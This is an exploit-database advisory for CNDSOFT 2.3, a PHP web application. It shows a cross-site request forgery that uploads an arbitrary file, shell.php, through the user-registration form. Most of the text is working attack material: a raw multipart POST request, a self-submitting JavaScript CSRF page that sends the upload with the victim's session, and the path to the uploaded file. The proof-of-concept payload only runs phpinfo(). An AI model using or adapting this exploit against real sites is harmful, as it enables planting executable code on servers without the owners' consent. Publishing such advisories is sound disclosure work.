CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload

EDB-ID:

40575

CVE:

N/A


Author:

Besim

Type:

webapps


Platform:

PHP

Date:

2016-10-19


*=========================================================================================================
# Exploit Title:  CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
*=========================================================================================================


Vulnerable URL and Parameter
========================================

Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla

Vulnerable Parameter = &mesaj_baslik


TECHNICAL DETAILS & POC & POST DATA
========================================

POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
——
Content-Type: multipart/form-data;
boundary=---------------------------5035863528338
Content-Length: 1037

-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"

✓
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"

CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"
m@yop.com
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"

30000
-----------------------------5035863528338
Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
Content-Type: application/octet-stream
*<?php
	phpinfo();

 ?>*
-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"

5200
-----------------------------5035863528338--


*CSRF PoC - File Upload (Shell.php)*

========================================

<html>
  <!-- CSRF PoC -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "
http://site_name/ofis/index.php?is=kullanici_tanimla", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
        xhr.withCredentials = true;
        var body = "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"utf8\"\r\n" +
          "\r\n" +
          "\xe2\x9c\x93\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
+
          "\r\n" +
          "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
          "\r\n" +
          "meryem\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
+
          "\r\n" +
          "meryem\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
          "\r\n" +
          "m@yop.com\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
          "\r\n" +
          "30000\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\x3c?php \r\n" +
          "\tphpinfo();\r\n" +
          "\r\n" +
          " ?\x3e\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
          "\r\n" +
          "5200\r\n" +
          "-----------------------------5035863528338--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request"
onclick="submitRequest();" />
    </form>
  </body>
</html>

========================================

*Access File : *http://www.site_name/path/personel_resimleri/shell.php


RISK
========================================

Attacker can arbitrary file upload.


--

Besim ALTINOK